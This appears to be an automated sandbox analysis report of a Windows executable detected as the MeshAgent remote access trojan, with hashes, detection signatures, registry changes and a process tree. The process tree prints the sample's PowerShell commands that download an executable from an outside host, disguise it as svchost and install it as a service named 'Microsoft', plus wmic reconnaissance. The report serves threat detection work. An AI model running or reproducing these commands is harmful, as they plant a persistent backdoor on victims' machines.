meshagent | d2f04edeffe112dabe2da967ffed766eeb4fbcedc6d193b28954fb3c035b5668

Analysis

max time kernel
140s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22/10/2024, 03:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe
Size

14.5MB
MD5

9d69443400acb97361efa9cf8e17f3ec
SHA1

2ac173ad00b5d38e2bc9478131f1cdb179b72e97
SHA256

d2f04edeffe112dabe2da967ffed766eeb4fbcedc6d193b28954fb3c035b5668
SHA512

91fad4044d8ce4343b716fdbf459223644ca4964f8768b9098d391699a40d76f00c97953cae69651765c19c998b0fb6effd0450e1fbb059bb6bd419afdeda665
SSDEEP

393216:QibEDlz7snaqtvylAjWZ0Xq9YLuxMfCVb2Xc2ZNLj+waARY:QibIlshtvylAjWZ0Xq9YLuxMfCVKs2jm

Score

10^/10

meshagent backdoor discovery execution persistence rat trojan upx

Malware Config

Signatures

Detects MeshAgent payload 5 IoCs

resource	yara_rule
behavioral2/memory/372-86-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	family_meshagent
behavioral2/memory/3404-88-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	family_meshagent
behavioral2/memory/372-116-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	family_meshagent
behavioral2/memory/392-140-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	family_meshagent
behavioral2/memory/392-141-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	family_meshagent

MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent

Blocklisted process makes network request 3 IoCs

flow	pid	Process
10	2520	powershell.exe
29	764	powershell.exe
33	5056	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1508	powershell.exe
2748	powershell.exe
3608	powershell.exe
2892	powershell.exe
764	powershell.exe
5056	powershell.exe

Downloads MZ/PE file

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Microsoft\ImagePath = "\"C:\\Users\\Admin\\AppData\\local\\svchost\\svchost.exe\" --meshServiceName=\"Microsoft\""	svchost.exe

Executes dropped EXE 4 IoCs

pid	Process
716	_가이아서버 접속기.exe
3404	svchost.exe
372	svchost.exe
392	svchost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\dll\ncrypt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\gdi32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\shell32.pdb	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\C5F31FCF9C0A9471A282FB3497BA94EB1F6F6D98	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\gdiplus.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\bcryptprimitives.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\comctl32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\comctl32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\gdiplus.pdb	svchost.exe
File opened for modification	C:\Windows\System32\msvcrt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\bcryptprimitives.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ole32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\dbghelp.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\exe\svchost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\rpcrt4.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\dbghelp.pdb	svchost.exe
File opened for modification	C:\Windows\System32\iphlpapi.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\A59EFDDA09C899AAFB362A36D5D00D044E876540	svchost.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\sechost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\gdi32full.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ws2_32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\advapi32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\win32u.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcp_win.pdb	svchost.exe
File opened for modification	C:\Windows\System32\shcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\exe\svchost.pdb	svchost.exe
File opened for modification	C:\Windows\System32\DLL\dbgcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ntasn1.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dbgcore.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	svchost.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	svchost.exe
File opened for modification	C:\Windows\System32\comctl32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	svchost.exe
File opened for modification	C:\Windows\System32\DLL\bcrypt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ucrtbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\ws2_32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\symbols\DLL\bcrypt.pdb	svchost.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\ws2_32.pdb	svchost.exe
File opened for modification	C:\Windows\System32\gdiplus.pdb	svchost.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	svchost.exe

UPX packed file 7 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000e000000023b77-81.dat	upx
behavioral2/memory/3404-83-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	upx
behavioral2/memory/372-86-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	upx
behavioral2/memory/3404-88-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	upx
behavioral2/memory/372-116-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	upx
behavioral2/memory/392-140-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	upx
behavioral2/memory/392-141-0x00007FF6AD020000-0x00007FF6AD3A4000-memory.dmp	upx

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1528	716	WerFault.exe	92

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	_가이아서버 접속기.exe

Modifies data under HKEY_USERS 53 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133740403870826906"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
2520	powershell.exe
2520	powershell.exe
1508	powershell.exe
1508	powershell.exe
2748	powershell.exe
2748	powershell.exe
764	powershell.exe
764	powershell.exe
5056	powershell.exe
5056	powershell.exe
5056	powershell.exe
3608	powershell.exe
3608	powershell.exe
3608	powershell.exe
2892	powershell.exe
2892	powershell.exe
2892	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2520	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	764	powershell.exe
Token: SeDebugPrivilege	5056	powershell.exe
Token: SeDebugPrivilege	3608	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	4928	wmic.exe
Token: SeIncreaseQuotaPrivilege	4928	wmic.exe
Token: SeSecurityPrivilege	4928	wmic.exe
Token: SeTakeOwnershipPrivilege	4928	wmic.exe
Token: SeLoadDriverPrivilege	4928	wmic.exe
Token: SeSystemtimePrivilege	4928	wmic.exe
Token: SeBackupPrivilege	4928	wmic.exe
Token: SeRestorePrivilege	4928	wmic.exe
Token: SeShutdownPrivilege	4928	wmic.exe
Token: SeSystemEnvironmentPrivilege	4928	wmic.exe
Token: SeUndockPrivilege	4928	wmic.exe
Token: SeManageVolumePrivilege	4928	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	4928	wmic.exe
Token: SeIncreaseQuotaPrivilege	4928	wmic.exe
Token: SeSecurityPrivilege	4928	wmic.exe
Token: SeTakeOwnershipPrivilege	4928	wmic.exe
Token: SeLoadDriverPrivilege	4928	wmic.exe
Token: SeSystemtimePrivilege	4928	wmic.exe
Token: SeBackupPrivilege	4928	wmic.exe
Token: SeRestorePrivilege	4928	wmic.exe
Token: SeShutdownPrivilege	4928	wmic.exe
Token: SeSystemEnvironmentPrivilege	4928	wmic.exe
Token: SeUndockPrivilege	4928	wmic.exe
Token: SeManageVolumePrivilege	4928	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2080	wmic.exe
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	2080	wmic.exe
Token: SeIncreaseQuotaPrivilege	2080	wmic.exe
Token: SeSecurityPrivilege	2080	wmic.exe
Token: SeTakeOwnershipPrivilege	2080	wmic.exe
Token: SeLoadDriverPrivilege	2080	wmic.exe
Token: SeSystemtimePrivilege	2080	wmic.exe
Token: SeBackupPrivilege	2080	wmic.exe
Token: SeRestorePrivilege	2080	wmic.exe
Token: SeShutdownPrivilege	2080	wmic.exe
Token: SeSystemEnvironmentPrivilege	2080	wmic.exe
Token: SeUndockPrivilege	2080	wmic.exe
Token: SeManageVolumePrivilege	2080	wmic.exe
Token: SeAssignPrimaryTokenPrivilege	1388	wmic.exe
Token: SeIncreaseQuotaPrivilege	1388	wmic.exe
Token: SeSecurityPrivilege	1388	wmic.exe
Token: SeTakeOwnershipPrivilege	1388	wmic.exe
Token: SeLoadDriverPrivilege	1388	wmic.exe
Token: SeSystemtimePrivilege	1388	wmic.exe
Token: SeBackupPrivilege	1388	wmic.exe
Token: SeRestorePrivilege	1388	wmic.exe
Token: SeShutdownPrivilege	1388	wmic.exe
Token: SeSystemEnvironmentPrivilege	1388	wmic.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 2976 wrote to memory of 2520	2976	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	85
PID 2976 wrote to memory of 2520	2976	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	85
PID 2976 wrote to memory of 3520	2976	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	89
PID 2976 wrote to memory of 3520	2976	2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe	89
PID 3520 wrote to memory of 996	3520	cmd.exe	90
PID 3520 wrote to memory of 996	3520	cmd.exe	90
PID 4064 wrote to memory of 716	4064	explorer.exe	92
PID 4064 wrote to memory of 716	4064	explorer.exe	92
PID 4064 wrote to memory of 716	4064	explorer.exe	92
PID 2520 wrote to memory of 1508	2520	powershell.exe	98
PID 2520 wrote to memory of 1508	2520	powershell.exe	98
PID 2520 wrote to memory of 2748	2520	powershell.exe	99
PID 2520 wrote to memory of 2748	2520	powershell.exe	99
PID 2520 wrote to memory of 764	2520	powershell.exe	100
PID 2520 wrote to memory of 764	2520	powershell.exe	100
PID 2520 wrote to memory of 5056	2520	powershell.exe	114
PID 2520 wrote to memory of 5056	2520	powershell.exe	114
PID 2520 wrote to memory of 3608	2520	powershell.exe	116
PID 2520 wrote to memory of 3608	2520	powershell.exe	116
PID 3608 wrote to memory of 3404	3608	powershell.exe	117
PID 3608 wrote to memory of 3404	3608	powershell.exe	117
PID 372 wrote to memory of 4928	372	svchost.exe	120
PID 372 wrote to memory of 4928	372	svchost.exe	120
PID 372 wrote to memory of 2080	372	svchost.exe	122
PID 372 wrote to memory of 2080	372	svchost.exe	122
PID 372 wrote to memory of 1388	372	svchost.exe	124
PID 372 wrote to memory of 1388	372	svchost.exe	124
PID 372 wrote to memory of 4904	372	svchost.exe	126
PID 372 wrote to memory of 4904	372	svchost.exe	126
PID 372 wrote to memory of 1696	372	svchost.exe	128
PID 372 wrote to memory of 1696	372	svchost.exe	128
PID 372 wrote to memory of 1268	372	svchost.exe	130
PID 372 wrote to memory of 1268	372	svchost.exe	130
PID 392 wrote to memory of 4544	392	svchost.exe	136
PID 392 wrote to memory of 4544	392	svchost.exe	136
PID 392 wrote to memory of 1996	392	svchost.exe	138
PID 392 wrote to memory of 1996	392	svchost.exe	138
PID 392 wrote to memory of 5024	392	svchost.exe	140
PID 392 wrote to memory of 5024	392	svchost.exe	140
PID 392 wrote to memory of 3420	392	svchost.exe	142
PID 392 wrote to memory of 3420	392	svchost.exe	142
PID 392 wrote to memory of 396	392	svchost.exe	144
PID 392 wrote to memory of 396	392	svchost.exe	144
PID 392 wrote to memory of 2892	392	svchost.exe	146
PID 392 wrote to memory of 2892	392	svchost.exe	146

C:\Users\Admin\AppData\Local\Temp\2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-10-22_9d69443400acb97361efa9cf8e17f3ec_hijackloader_poet-rat_snatch.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2976
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2520
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "New-Item -ItemType Directory -Force -Path C:\Users\Admin\AppData\local\svchost"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -uninstall"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.exe -OutFile C:\Users\Admin\AppData\local\svchost\svchost.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:764
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "Invoke-WebRequest https://pub-fd29cd63fb8c4b7fb0c7d3fa893212b9.r2.dev/svchost.msh -OutFile C:\Users\Admin\AppData\local\svchost\svchost.msh"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "C:\Users\Admin\AppData\local\svchost\svchost.exe -install"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3608
  - - C:\Users\Admin\AppData\local\svchost\svchost.exe
      "C:\Users\Admin\AppData\local\svchost\svchost.exe" -install
      4⤵
      Sets service image path in registry
      Executes dropped EXE
      PID:3404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c explorer.exe "_가이아서버 접속기.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3520
- - C:\Windows\explorer.exe
    explorer.exe "_가이아서버 접속기.exe"
    3⤵
    PID:996

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:4064
- C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe
  "C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:716
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 716 -s 848
    3⤵
    - Program crash
    PID:1528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 716 -ip 716
1⤵
PID:3312

C:\Users\Admin\AppData\local\svchost\svchost.exe
"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:372
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4928
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2080
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1388
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:4904
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:1696
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:1268

C:\Users\Admin\AppData\local\svchost\svchost.exe
"C:\Users\Admin\AppData\local\svchost\svchost.exe" --meshServiceName="Microsoft"
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:392
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:4544
- C:\Windows\system32\wbem\wmic.exe
  wmic os get oslanguage /FORMAT:LIST
  2⤵
  PID:1996
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:5024
- C:\Windows\System32\wbem\wmic.exe
  wmic SystemEnclosure get ChassisTypes
  2⤵
  PID:3420
- C:\Windows\System32\wbem\wmic.exe
  wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
  2⤵
  PID:396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -noprofile -nologo -command -
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:2892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
